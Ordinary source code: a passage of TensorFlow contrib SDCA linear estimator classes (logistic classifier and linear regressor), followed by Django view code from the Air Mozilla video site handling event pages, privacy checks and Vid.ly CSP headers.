* num_loss_partitions: Number of partitions of the global loss function
optimized by `SDCAOptimizer`.
* weight_column_name: A string defining the weight feature column, or
None if there are no weights.
* update_weights_hook: A `SessionRunHook` object or None. Used to update
model weights.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If the type of head is not one of `_BinarySvmHead`,
`_RegressionHead` or `_MultiClassHead`.
ValueError: If mode is not any of the `ModeKeys`.
"""
head = params["head"]
feature_columns = params["feature_columns"]
example_id_column = params["example_id_column"]
l1_regularization = params["l1_regularization"]
l2_regularization = params["l2_regularization"]
num_loss_partitions = params["num_loss_partitions"]
weight_column_name = params["weight_column_name"]
update_weights_hook = params.get("update_weights_hook", None)
loss_type = None
if isinstance(head, head_lib._BinarySvmHead): # pylint: disable=protected-access
loss_type = "hinge_loss"
elif isinstance(head, head_lib._BinaryLogisticHead): # pylint: disable=protected-access
loss_type = "logistic_loss"
elif isinstance(head, head_lib._RegressionHead): # pylint: disable=protected-access
loss_type = "squared_loss"
else:
raise ValueError("Unsupported head type: {}".format(type(head)))
assert head.logits_dimension == 1, (
"SDCA only applies to logits_dimension=1.")
# Update num_loss_partitions based on number of workers.
n_loss_partitions = num_loss_partitions or max(1, config.num_worker_replicas)
optimizer = sdca_optimizer.SDCAOptimizer(
example_id_column=example_id_column,
num_loss_partitions=n_loss_partitions,
symmetric_l1_regularization=l1_regularization,
symmetric_l2_regularization=l2_regularization)
parent_scope = "linear"
with variable_scope.variable_scope(
values=features.values(), name_or_scope=parent_scope) as scope:
features = features.copy()
features.update(layers.transform_features(features, feature_columns))
logits, columns_to_variables, bias = (
layers.weighted_sum_from_feature_columns(
columns_to_tensors=features,
feature_columns=feature_columns,
num_outputs=1,
scope=scope))
_add_bias_column(feature_columns, features, bias, columns_to_variables)
def _train_op_fn(unused_loss):
global_step = training_util.get_global_step()
sdca_model, train_op = optimizer.get_train_step(
columns_to_variables, weight_column_name, loss_type, features, labels,
global_step)
if update_weights_hook is not None:
update_weights_hook.set_parameters(sdca_model, train_op)
return train_op
model_fn_ops = head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=_train_op_fn,
logits=logits)
if update_weights_hook is not None:
return model_fn_ops._replace(training_chief_hooks=(
model_fn_ops.training_chief_hooks + [update_weights_hook]))
return model_fn_ops
class _SdcaUpdateWeightsHook(session_run_hook.SessionRunHook):
"""SessionRunHook to update and shrink SDCA model weights."""
def __init__(self):
pass
def set_parameters(self, sdca_model, train_op):
self._sdca_model = sdca_model
self._train_op = train_op
def begin(self):
"""Construct the update_weights op.
The op is implicitly added to the default graph.
"""
self._update_op = self._sdca_model.update_weights(self._train_op)
def before_run(self, run_context):
"""Return the update_weights op so that it is executed during this run."""
return session_run_hook.SessionRunArgs(self._update_op)
class _SDCAEstimator(estimator.Estimator):
"""Base estimator class for linear models using the SDCA optimizer.
This class should not be used directly. Rather, users should call one of the
derived estimators.
"""
def __init__(self,
example_id_column,
feature_columns,
weight_column_name=None,
model_dir=None,
head=None,
l1_regularization=0.0,
l2_regularization=1.0,
num_loss_partitions=None,
config=None,
feature_engineering_fn=None):
"""Construct a `_SDCAEstimator` estimator object.
Args:
example_id_column: A string defining the feature column name representing
example ids. Used to initialize the underlying SDCA optimizer.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
model_dir: Directory to save model parameters, graph etc. This can also be
used to load checkpoints from the directory into an estimator to
continue training a previously saved model.
head: type of head. Currently, _BinaryLogisticHead and _BinarySvmHead are
supported for classification and _RegressionHead for regression. It
should be a subclass of _SingleHead.
l1_regularization: L1-regularization parameter. Refers to global L1
regularization (across all examples).
l2_regularization: L2-regularization parameter. Refers to global L2
regularization (across all examples).
num_loss_partitions: number of partitions of the (global) loss function
optimized by the underlying optimizer (SDCAOptimizer).
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and returns features and
labels which will be fed into the model.
Returns:
A `_SDCAEstimator` estimator.
Raises:
ValueError: if head is not supported by SDCA.
"""
self._feature_columns = tuple(feature_columns or [])
assert self._feature_columns
if not _head_is_valid_for_sdca(head):
raise ValueError(
"head type: {} is not supported. Supported head types: "
"_BinaryLogisticHead, _BinarySvmHead and _RegressionHead.".format(
type(head)))
assert head.logits_dimension == 1
params = {
"head": head,
"feature_columns": feature_columns,
"example_id_column": example_id_column,
"num_loss_partitions": num_loss_partitions,
"l1_regularization": l1_regularization,
"l2_regularization": l2_regularization,
"weight_column_name": weight_column_name,
"update_weights_hook": _SdcaUpdateWeightsHook(),
}
super(_SDCAEstimator, self).__init__(
model_fn=sdca_model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
class SDCALogisticClassifier(_SDCAEstimator):
"""Logistic regression binary classifier using the SDCA optimizer.
Example usage:
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
classifier = SDCALogisticClassifier(
example_id_column='example_id',
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b]),
weight_column_name=...,
l2_regularization=...,
num_loss_partitions=...,
)
# Input builders
# returns x, y (where y is the label Tensor (with 0/1 values)
def input_fn_{train, eval}:
# returns x (features dict)
def input_fn_test:
...
classifier.fit(input_fn=input_fn_train)
classifier.evaluate(input_fn=input_fn_eval)
# Returns predicted classes.
classifier.predict_classes(input_fn=input_fn_test)
# Returns predicted probabilities.
classifier.predict_proba(input_fn=input_fn_test)
```
The input_fn provided to `fit`, `evaluate` and predict_* methods should return
the following features, otherwise there will be a `KeyError`:
* A feature with `key=example_id_column` whose value is a `Tensor` of dtype
string.
* If `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* For each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name` whose
`value` is a `SparseTensor`
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`
"""
def __init__(self,
example_id_column,
feature_columns,
weight_column_name=None,
model_dir=None,
l1_regularization=0.0,
l2_regularization=1.0,
num_loss_partitions=None,
config=None,
feature_engineering_fn=None):
"""Construct a `SDCALogisticClassifier` object.
Args:
example_id_column: A string defining the feature column name representing
example ids. Used to initialize the underlying SDCA optimizer.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the iterable should derive from `FeatureColumn`.
Note that the order of the items is ignored at model construction time.
weight_column_name: A string defining feature column name representing
weights. It is used to downweight or boost examples during training. It
will be multiplied by the loss of the example.
model_dir: Directory to save model parameters, graph etc. This can also be
used to load checkpoints from the directory into an estimator to
continue training a previously saved model.
l1_regularization: L1-regularization parameter. Refers to global L1
regularization (across all examples).
l2_regularization: L2-regularization parameter. Refers to global L2
regularization (across all examples).
num_loss_partitions: Number of partitions of the global loss function
optimized by the underlying optimizer (SDCAOptimizer).
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and returns features and
labels which will be fed into the model.
Returns:
A `SDCALogisiticClassifier` estimator.
"""
super(SDCALogisticClassifier, self).__init__(
example_id_column=example_id_column,
feature_columns=feature_columns,
weight_column_name=weight_column_name,
model_dir=model_dir,
head=head_lib.multi_class_head(
n_classes=2, weight_column_name=weight_column_name),
l1_regularization=l1_regularization,
l2_regularization=l2_regularization,
num_loss_partitions=num_loss_partitions,
config=config,
feature_engineering_fn=None)
def predict_classes(self, input_fn=None):
"""Runs inference to determine the predicted class.
Args:
input_fn: The input function providing features.
Returns:
A generator of predicted classes for the features provided by input_fn.
"""
key = prediction_key.PredictionKey.CLASSES
predictions = super(SDCALogisticClassifier, self).predict(
input_fn=input_fn, outputs=[key])
return (pred[key] for pred in predictions)
def predict_proba(self, input_fn=None):
"""Runs inference to determine the class probability predictions.
Args:
input_fn: The input function providing features.
Returns:
A generator of predicted class probabilities for the features provided by
input_fn.
"""
key = prediction_key.PredictionKey.PROBABILITIES
predictions = super(SDCALogisticClassifier, self).predict(
input_fn=input_fn, outputs=[key])
return (pred[key] for pred in predictions)
class SDCALinearRegressor(_SDCAEstimator):
"""Linear regression model using SDCA to solve the underlying optimization.
Example usage:
```python
real_column_a = real_valued_column(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
regressor = SDCALinearRegressor(
example_id_column='example_id',
feature_columns=[real_column_a, sparse_column_b]),
weight_column_name=...,
l2_regularization=...,
num_loss_partitions=...,
)
# Input builders
# returns x, y (where y is the label Tensor (with 0/1 values)
def input_fn_{train, eval}:
# returns x (features dict)
def input_fn_test:
...
regressor.fit(input_fn=input_fn_train)
regressor.evaluate(input_fn=input_fn_eval)
regressor.predict_scores(input_fn=input_fn_test) # returns predicted scores.
```
The input_fn provided to `fit`, `evaluate` and predict_* methods should return
the following features, otherwise there will be a `KeyError`:
* A feature with `key=example_id_column` whose value is a `Tensor` of dtype
string.
* If `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* For each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name` whose
`value` is a `SparseTensor`
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`
"""
def __init__(self,
example_id_column,
feature_columns,
weight_column_name=None,
model_dir=None,
l1_regularization=0.0,
l2_regularization=1.0,
num_loss_partitions=None,
config=None,
feature_engineering_fn=None):
"""Construct a `SDCALinearRegressor` estimator object.
Args:
example_id_column: A string defining the feature column name representing
example ids. Used to initialize the underlying SDCA optimizer.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the iterable should derive from `FeatureColumn`.
Note that the order of the items is ignored at model construction time.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
model_dir: Directory to save model parameters, graph etc. This can also be
used to load checkpoints from the directory into an estimator to
continue training a previously saved model.
l1_regularization: L1-regularization parameter. Refers to global L1
regularization (across all examples).
l2_regularization: L2-regularization parameter. Refers to global L2
regularization (across all examples).
num_loss_partitions: number of partitions of the (global) loss function
optimized by the underlying optimizer (SDCAOptimizer).
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and returns features and
labels which will be fed into the model.
Returns:
A `SDCALinearRegressor` estimator.
"""
super(SDCALinearRegressor, self).__init__(
example_id_column=example_id_column,
feature_columns=feature_columns,
weight_column_name=weight_column_name,
model_dir=model_dir,
head=head_lib.regression_head(weight_column_name=weight_column_name),
l1_regularization=l1_regularization,
l2_regularization=l2_regularization,
num_loss_partitions=num_loss_partitions,
config=config,
feature_engineering_fn=None)
def predict_scores(self, input_fn):
"""Returns predicted scores for given features.
Args:
input_fn: The input function providing features.
Returns:
A generator of predicted scores for the features provided by input_fn.
"""
key = prediction_key.PredictionKey.SCORES
predictions = super(SDCALinearRegressor, self).predict(
input_fn=input_fn, outputs=[key])
return (pred[key] for pred in predictions)
|
|
import datetime
import hashlib
import urllib
import time
import collections
import urlparse
import requests
from django import http
from django.conf import settings
from django.contrib.sites.requests import RequestSite
from django.shortcuts import get_object_or_404, redirect, render
from django.core.cache import cache
from django.views.decorators.cache import never_cache
from django.views.generic.base import View
from django.db.models import Count, Q, F
from django.db import transaction
from django.core.urlresolvers import reverse
from django.template import engines
from django.utils import timezone
from jsonview.decorators import json_view
from airmozilla.main.models import (
Event,
EventOldSlug,
Tag,
Channel,
EventHitStats,
CuratedGroup,
Picture,
VidlySubmission,
EventLiveHits,
Chapter,
VidlyTagDomain,
)
from airmozilla.base.utils import (
paginate,
edgecast_tokenize,
akamai_tokenize,
)
from airmozilla.main.templatetags.jinja_helpers import thumbnail
from airmozilla.search.models import LoggedSearch
from airmozilla.comments.models import Discussion
from airmozilla.surveys.models import Survey
# from airmozilla.subtitles.models import AmaraVideo
from airmozilla.closedcaptions.models import ClosedCaptionsTranscript
from airmozilla.manage import vidly
from airmozilla.manage import related
from airmozilla.base import mozillians
from airmozilla.staticpages.views import staticpage
from airmozilla.main import cloud
from airmozilla.main.views import is_contributor, is_employee
from airmozilla.main import forms
def page(request, template):
"""Base page: renders templates bare, used for static pages."""
return render(request, template)
def home(request, page=1, channel_slug=settings.DEFAULT_CHANNEL_SLUG):
"""Paginated recent videos and live videos."""
channels = Channel.objects.filter(slug=channel_slug)
if not channels.count():
if channel_slug == settings.DEFAULT_CHANNEL_SLUG:
# then, the Main channel hasn't been created yet
Channel.objects.create(
name=settings.DEFAULT_CHANNEL_NAME,
slug=settings.DEFAULT_CHANNEL_SLUG
)
channels = Channel.objects.filter(slug=channel_slug)
else:
raise http.Http404('Channel not found')
request.channels = channels
privacy_filter = {}
privacy_exclude = {}
archived_events = Event.objects.archived()
if request.user.is_active:
if is_contributor(request.user):
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
# privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
archived_events = archived_events.approved()
if privacy_filter:
archived_events = archived_events.filter(**privacy_filter)
elif privacy_exclude:
archived_events = archived_events.exclude(**privacy_exclude)
archived_events = archived_events.order_by('-start_time')
archived_events = archived_events.select_related('picture')
found_tags = []
if request.GET.getlist('tag'):
requested_tags = request.GET.getlist('tag')
for each in requested_tags:
found_tags.extend(Tag.objects.filter(name__iexact=each))
if len(found_tags) < len(requested_tags):
# invalid tags were used in the query string
url = reverse('main:home')
if found_tags:
# some were good
url += '?%s' % urllib.urlencode({
'tag': [x.name for x in found_tags]
}, True)
return redirect(url, permanent=True)
archived_events = archived_events.filter(tags__in=found_tags)
if found_tags:
# no live events when filtering by tag
live_events = Event.objects.none()
else:
live_events = (Event.objects.live()
.order_by('start_time'))
if not request.user.is_active:
live_events = live_events.approved()
if privacy_filter:
live_events = live_events.filter(**privacy_filter)
elif privacy_exclude:
live_events = live_events.exclude(**privacy_exclude)
# apply the mandatory channels filter
# but only do this if it's not filtered by tags
live_events = live_events.filter(channels=channels)
archived_events = archived_events.filter(channels=channels)
live_events = live_events.select_related('picture')
if channels and channels[0].reverse_order:
archived_events = archived_events.reverse()
archived_paged = paginate(archived_events, page, 10)
# to simplify the complexity of the template when it tries to make the
# pagination URLs, we just figure it all out here
next_page_url = prev_page_url = None
channel = channels[0]
if archived_paged.has_next():
if channel.slug == settings.DEFAULT_CHANNEL_SLUG:
next_page_url = reverse(
'main:home',
args=(archived_paged.next_page_number(),)
)
else:
next_page_url = reverse(
'main:home_channels',
args=(channel.slug,
archived_paged.next_page_number())
)
if archived_paged.has_previous():
if channel.slug == settings.DEFAULT_CHANNEL_SLUG:
prev_page_url = reverse(
'main:home',
args=(archived_paged.previous_page_number(),)
)
else:
prev_page_url = reverse(
'main:home_channels',
args=(channel.slug,
archived_paged.previous_page_number())
)
events_qs = Event.objects.archived().all()
if request.user.is_active:
if is_contributor(request.user):
feed_privacy = 'contributors'
events_qs = events_qs.exclude(privacy=Event.PRIVACY_COMPANY)
else:
feed_privacy = 'company'
else:
events_qs = events_qs.filter(privacy=Event.PRIVACY_PUBLIC)
feed_privacy = 'public'
channel_children = []
for child in channel.get_children().order_by('name'):
channel_children.append((
child,
events_qs.filter(channels=child).count()
))
curated_groups_map = collections.defaultdict(list)
curated_groups = (
CuratedGroup.objects.all()
.values_list('event_id', 'name')
.order_by('name')
)
for event_id, name in curated_groups:
curated_groups_map[event_id].append(name)
def get_curated_groups(event):
return curated_groups_map.get(event.id)
context = {
'events': archived_paged,
'live_events': live_events,
'tags': found_tags,
'Event': Event,
'channel': channel,
'channel_children': channel_children,
'feed_privacy': feed_privacy,
'next_page_url': next_page_url,
'prev_page_url': prev_page_url,
'get_curated_groups': get_curated_groups,
}
return render(request, 'main/home.html', context)
def can_view_event(event, user):
"""return True if the current user has right to view this event"""
if event.privacy == Event.PRIVACY_PUBLIC:
return True
elif not user.is_active:
return False
# you're logged in
if event.privacy == Event.PRIVACY_COMPANY:
# but then it's not good enough to be contributor
if is_contributor(user):
return False
else:
if not is_contributor(user):
# staff can always see it
return True
curated_groups = [
x[0] for x in
CuratedGroup.objects.filter(event=event).values_list('name')
]
if curated_groups:
return any(
[mozillians.in_group(user.email, x) for x in curated_groups]
)
return True
class EventView(View):
"""Video, description, and other metadata."""
template_name = 'main/event.html'
def cant_view_event(self, event, request):
"""return a response appropriate when you can't view the event"""
if request.user.is_authenticated():
return redirect('main:permission_denied', event.slug)
else:
desired_url = reverse('main:event', args=(event.slug,))
url = reverse('main:login')
return redirect('%s?next=%s' % (url, urllib.quote(desired_url)))
def cant_find_event(self, request, slug):
"""return an appropriate response if no event can be found"""
return staticpage(request, slug)
def can_view_event(self, event, request):
"""wrapper on the utility function can_view_event()"""
return can_view_event(event, request.user)
def get_default_context(self, event, request):
context = {}
prefix = request.is_secure() and 'https' or 'http'
root_url = '%s://%s' % (prefix, RequestSite(request).domain)
url = reverse('main:event_video', kwargs={'slug': event.slug})
absolute_url = root_url + url
context['embed_code'] = (
'<iframe src="%s" '
'width="640" height="380" frameborder="0" allowfullscreen>'
'</iframe>'
% absolute_url
)
context['embed_code_big'] = (
'<iframe src="%s" '
'width="896" height="524" frameborder="0" allowfullscreen>'
'</iframe>'
% absolute_url
)
return context
def get_event(self, slug, request):
try:
return Event.objects.get(slug=slug)
except Event.DoesNotExist:
try:
return Event.objects.get(slug__iexact=slug)
except Event.DoesNotExist:
try:
old_slug = EventOldSlug.objects.get(slug=slug)
return redirect('main:event', slug=old_slug.event.slug)
except EventOldSlug.DoesNotExist:
# does it exist as a static page
if slug.isdigit():
# it might be the ID of the event
try:
return Event.objects.get(id=slug)
except Event.DoesNotExist:
# not that either
pass
return self.cant_find_event(request, slug)
@staticmethod
def get_vidly_information(event, tag):
cache_key = 'event_vidly_information-{}'.format(event.id)
from_cache = cache.get(cache_key)
if from_cache is not None:
return from_cache
# It was not cached, we have to figure it out
vidly_tag = hd = None
if (
not (event.is_pending() or event.is_processing()) and
event.is_public() and
event.has_vidly_template() and event.template_environment
):
if event.template_environment.get('tag'):
vidly_tag = tag or event.template_environment['tag']
hd = False # default
vidly_submissions = (
VidlySubmission.objects
.filter(event=event, tag=vidly_tag)
.order_by('-submission_time')
)
for vidly_submission in vidly_submissions.values('hd'):
hd = vidly_submission['hd']
break
cache.set(cache_key, (vidly_tag, hd), 60 * 60)
return vidly_tag, hd
def get(self, request, slug):
event = self.get_event(slug, request)
if isinstance(event, http.HttpResponse):
return event
if not self.can_view_event(event, request):
return self.cant_view_event(event, request)
tag = request.GET.get('tag')
warning = None
ok_statuses = (
Event.STATUS_SCHEDULED,
Event.STATUS_PENDING,
Event.STATUS_PROCESSING,
)
if event.status not in ok_statuses:
if not request.user.is_superuser:
self.template_name = 'main/event_not_scheduled.html'
else:
warning = "Event is not publicly visible - not scheduled."
if event.approval_set.filter(approved=False).exists():
if not request.user.is_active:
return http.HttpResponse('Event not approved')
else:
warning = "Event is not publicly visible - not yet approved."
hits = None
# assume this to false to start with
can_edit_chapters = False
template_tagged = ''
if event.template and not event.is_upcoming():
# The only acceptable way to make autoplay be on
# is to send ?autoplay=true
# All other attempts will switch it off.
autoplay = request.GET.get('autoplay', 'false') == 'true'
try:
template_tagged = get_video_tagged(
event,
request,
autoplay=autoplay,
tag=tag,
)
except VidlySubmission.DoesNotExist:
return http.HttpResponseBadRequest(
'Tag %s does not exist for this event' % (tag,)
)
stats_query = (
EventHitStats.objects.filter(event=event)
.values_list('total_hits', flat=True)
)
for total_hits in stats_query:
hits = total_hits
# if the event has a template is not upcoming
if not event.is_live() and event.is_scheduled():
# ...and is not live, then
if request.user.is_active:
can_edit_chapters = True
can_manage_edit_event = (
request.user.is_active and
request.user.is_staff and
request.user.has_perm('main.change_event')
)
can_edit_event = request.user.is_active
can_edit_discussion = (
can_edit_event and
# This is a little trick to avoid waking up the
# SimpleLazyObject on the user. If the .is_active is true
# the ID will have already been set by the session.
# So doing this comparison instead avoids causing a
# select query on the auth_user table.
request.user.pk == event.creator_id and
Discussion.objects.filter(event=event).exists()
)
request.channels = event.channels.all()
# needed for the open graph stuff
event.url = reverse('main:event', args=(event.slug,))
context = self.get_default_context(event, request)
context.update({
'event': event,
'video': template_tagged,
'warning': warning,
'can_manage_edit_event': can_manage_edit_event,
'can_edit_event': can_edit_event,
'can_edit_discussion': can_edit_discussion,
'can_edit_chapters': can_edit_chapters,
'Event': Event,
'hits': hits,
'tags': [t.name for t in event.tags.all()],
'channels': request.channels,
# needed for the _event_privacy.html template
'curated_groups': CuratedGroup.get_names(event),
})
context['chapters'] = Chapter.objects.filter(
event=event,
is_active=True,
)
# By default, we want to hint in the DOM that this is an HD
# video.
context['hd'] = event.is_scheduled() and not event.is_upcoming()
vidly_tag, vidly_hd = self.get_vidly_information(event, tag)
if vidly_tag:
context['vidly_tag'] = vidly_tag
context['vidly_hd'] = vidly_hd
if not vidly_hd:
context['hd'] = False
# If the event is in the processing state (or pending), we welcome
# people to view it but it'll say that the video isn't ready yet.
# But we'll also try to include an estimate of how long we think
# it will take until it's ready to be viewed.
context['estimated_time_left'] = None
context['time_run'] = None
if (
(event.is_processing() or event.is_pending()) and
event.duration and
event.template_environment.get('tag')
):
vidly_submissions = (
VidlySubmission.objects
.filter(event=event, tag=event.template_environment.get('tag'))
.order_by('-submission_time')
)
for vidly_submission in vidly_submissions[:1]:
context['estimated_time_left'] = (
vidly_submission.get_estimated_time_left()
)
context['time_run'] = (
(
timezone.now() - vidly_submission.submission_time
).seconds
)
if event.pin:
if (
not request.user.is_authenticated() or
not is_employee(request.user)
):
entered_pins = request.session.get('entered_pins', [])
if event.pin not in entered_pins:
self.template_name = 'main/event_requires_pin.html'
context['pin_form'] = forms.PinForm()
try:
context['discussion'] = Discussion.objects.get(event=event)
# The name of the channel we publish to fanout on when there's
# changes to this events comments.
context['subscription_channel_comments'] = 'comments-{}'.format(
event.id
)
except Discussion.DoesNotExist:
context['discussion'] = {'enabled': False}
context['subscription_channel_status'] = 'event-{}'.format(event.id)
# amara_videos = AmaraVideo.objects.filter(
# event=event,
# transcript__isnull=False,
# )
# context['amara_video'] = None
# for amara_video in amara_videos.order_by('-modified')[:1]:
# context['amara_video'] = amara_video
context['closedcaptions'] = None
for connection in ClosedCaptionsTranscript.objects.filter(event=event):
assert connection.closedcaptions.transcript
context['closedcaptions'] = connection.closedcaptions
cache_key = 'event_survey_id_%s' % event.id
context['survey_id'] = cache.get(cache_key, -1)
if context['survey_id'] == -1: # not known in cache
try:
survey = Survey.objects.get(
events=event,
active=True
)
cache.set(cache_key, survey.id, 60 * 60 * 24)
context['survey_id'] = survey.id
except Survey.DoesNotExist:
cache.set(cache_key, None, 60 * 60 * 24)
context['survey_id'] = None
if settings.LOG_SEARCHES:
if request.session.get('logged_search'):
pk, time_ago = request.session.get('logged_search')
age = time.time() - time_ago
if age <= 5:
# the search was made less than 5 seconds ago
try:
logged_search = LoggedSearch.objects.get(pk=pk)
logged_search.event_clicked = event
logged_search.save()
except LoggedSearch.DoesNotExist:
pass
response = render(request, self.template_name, context)
self._set_csp_update(response, event)
return response
def _set_csp_update(self, response, event):
"""Hack alert!
We need to, potentially, update the CSP at run time if the
video you're trying to watch is a Vid.ly video.
Vid.ly is embedded by simply using `https://vid.ly/:shortcode`
but internally they will redirect to a AWS CloudFront domain
which we might not have prepared in our CSP settings.
So let's update that on the fly.
"""
cache_key = 'custom_csp_update:{}'.format(event.id)
update = cache.get(cache_key)
if update is not None:
# it was set, use that and exit early
if update:
response._csp_update = update
return
if not event.template:
return
if event.is_upcoming() or event.is_live() or not event.is_scheduled():
return
if 'vid.ly' not in event.template.name.lower():
return
if not event.template_environment.get('tag'):
return
tag = event.template_environment['tag']
update = get_vidly_csp_headers(tag, private=not event.is_public())
cache.set(cache_key, update, 60 * 60)
# Now we've figured out what headers to update, set it on the response
if update:
response._csp_update = update
def post(self, request, slug):
event = get_object_or_404(Event, slug=slug)
pin_form = forms.PinForm(request.POST, instance=event)
if pin_form.is_valid():
entered_pins = self.request.session.get('entered_pins', [])
pin = pin_form.cleaned_data['pin']
if pin not in entered_pins:
entered_pins.append(pin)
request.session['entered_pins'] = entered_pins
return redirect('main:event', slug=slug)
context = {
'event': event,
'pin_form': pin_form,
}
return render(request, 'main/event_requires_pin.html', context)
def get_vidly_csp_headers(tag, private=False):
token = None
if private:
token = vidly.tokenize(tag, 90)
headers = {}
def get_netloc(type_, url_format):
netloc = None
try:
found = VidlyTagDomain.objects.get(
tag=tag,
type=type_,
)
if found.private != private:
# The tag has changed!
found.delete()
raise VidlyTagDomain.DoesNotExist
elif found.domain == 'm.vid.ly': # pragma: no cover
# In a previous life, airmozilla might have attempted to
# look up what the CDN domain was and if it failed,
# Vid.ly would just redirect to 'https://m.vid.ly' which
# is NOT the right CDN domain. We shouldn't have stored
# that.
# This knowledge was added in June 2017 and from now on
# we never save this as the domain so it should cease.
found.delete()
raise VidlyTagDomain.DoesNotExist
else:
netloc = found.domain
except VidlyTagDomain.DoesNotExist:
url = url_format.format(
tag
)
if token:
url += '&token={}'.format(token)
head_response = requests.head(url)
if head_response.status_code == 302:
if head_response.headers['Location'] == 'https://m.vid.ly':
# Basically, it didn't work.
# When vid.ly can't redirect to the actual file, for
# some reason it instead redirects to the exact
# URL 'https://m.vid.ly'. For example:
#
# curl -v https://vid.ly/l1c2w5/blalbla
# ...
# < HTTP/1.1 302 Found
# ...
# < Location: https://m.vid.ly
#
# Odd right? But it basically means to use that we
# we not able to do the lookup. Sorry.
return
netloc = urlparse.urlparse(
head_response.headers['Location']
).netloc
assert netloc, head_response.headers['Location']
VidlyTagDomain.objects.create(
tag=tag,
type=type_,
private=private,
domain=netloc,
)
return netloc
media_netloc = get_netloc('webm', settings.VIDLY_VIDEO_URL_FORMAT)
if media_netloc:
headers['media-src'] = media_netloc
# In almost all cases, the poster image is on the same domain
# as the video. So let's use that.
# Later we're going to try to do a specific lookup for the poster.
# If that's better/different that becomes the added domain
# for 'img-src' instead.
headers['img-src'] = media_netloc
# There is no way to pre-lookup what the actual CDN domain is
# for the webvtt.vtt file is so let's hope for the best and
# reuse the the domain for media on the connect-src too.
headers['connect-src'] = media_netloc
lock_cache_key = 'poster_netloc_failed:{}'.format(tag)
if not cache.get(lock_cache_key):
img_netloc = get_netloc('poster', settings.VIDLY_POSTER_URL_FORMAT)
if img_netloc:
headers['img-src'] = img_netloc
else:
# If that failed, don't bother trying again. For a while.
cache.set(lock_cache_key, True, 60 * 60)
return headers
class EventByIDView(EventView):
def get(self, request, id):
event = get_object_or_404(Event, id=id)
if not self.can_view_event(event, request):
return self.cant_view_event(event, request)
return redirect('main:event', event.slug)
def get_video_tagged(event, request, autoplay=False, tag=None):
def poster_url(geometry='896x504', crop='center'):
image = event.picture and event.picture.file or event.placeholder_img
return thumbnail(image, geometry, crop=crop).url
context = {
'md5': lambda s: hashlib.md5(s).hexdigest(),
'event': event,
'request': request,
'datetime': datetime.datetime.utcnow(),
'vidly_tokenize': vidly.tokenize,
'edgecast_tokenize': edgecast_tokenize,
'akamai_tokenize': akamai_tokenize,
'popcorn_url': event.popcorn_url,
'autoplay': autoplay and 'true' or 'false', # javascript
'poster_url': poster_url,
}
if isinstance(event.template_environment, dict):
context.update(event.template_environment)
if tag:
submissions = VidlySubmission.objects.filter(
tag=tag,
event=event
)
if not submissions.exists():
raise VidlySubmission.DoesNotExist(tag)
context['tag'] = tag
template = engines['backend'].from_string(event.template.content)
try:
template_tagged = template.render(context)
except vidly.VidlyTokenizeError, msg:
template_tagged = '<code style="color:red">%s</code>' % msg
return template_tagged
class EventVideoView(EventView):
template_name = 'main/event_video.html'
def can_view_event(self, event, request):
if self.embedded:
if event.privacy != Event.PRIVACY_PUBLIC:
# If you are the owner of it, it's fine, if we don't
# want any warnings
if (
self.no_warning and
request.user.is_active and request.user == event.creator
):
return True
return False
return True
else:
return super(EventVideoView, self).can_view_event(event, request)
def cant_view_event(self, event, request):
"""return a response appropriate when you can't view the event"""
return render(request, self.template_name, {
'error': "Not a public event",
'event': None,
})
def cant_find_event(self, request, slug):
"""return an appropriate response if no event can be found"""
return render(request, self.template_name, {
'error': "Event not found",
'event': None
})
def get_default_context(self, event, request):
context = {}
prefix = request.is_secure() and 'https' or 'http'
root_url = '%s://%s' % (prefix, RequestSite(request).domain)
url = reverse('main:event', kwargs={'slug': event.slug})
context['absolute_url'] = root_url + url
context['embedded'] = self.embedded
context['no_warning'] = self.no_warning
context['no_footer'] = request.GET.get('no-footer')
return context
def get(self, request, slug):
self.embedded = request.GET.get('embedded', 'true') == 'true'
self.no_warning = request.GET.get('no-warning')
response = super(EventVideoView, self).get(request, slug)
# ALLOWALL is what YouTube uses for sharing
if self.embedded:
response['X-Frame-Options'] = 'ALLOWALL'
return response
class EventDiscussionView(EventView):
template_name = 'main/event_discussion.html'
def can_edit_discussion(self, event, request):
# this might change in the future to only be
# employees and vouched mozillians
return (
request.user.is_active and
request.user == event.creator and
Discussion.objects.filter(event=event)
)
def cant_edit_discussion(self, event, user):
return redirect('main:event', event.slug)
def get_event_safely(self, slug, request):
event = self.get_event(slug, request)
if isinstance(event, http.HttpResponse):
return event
if not self.can_view_event(event, request):
return self.cant_view_event(event, request)
if not self.can_edit_discussion(event, request):
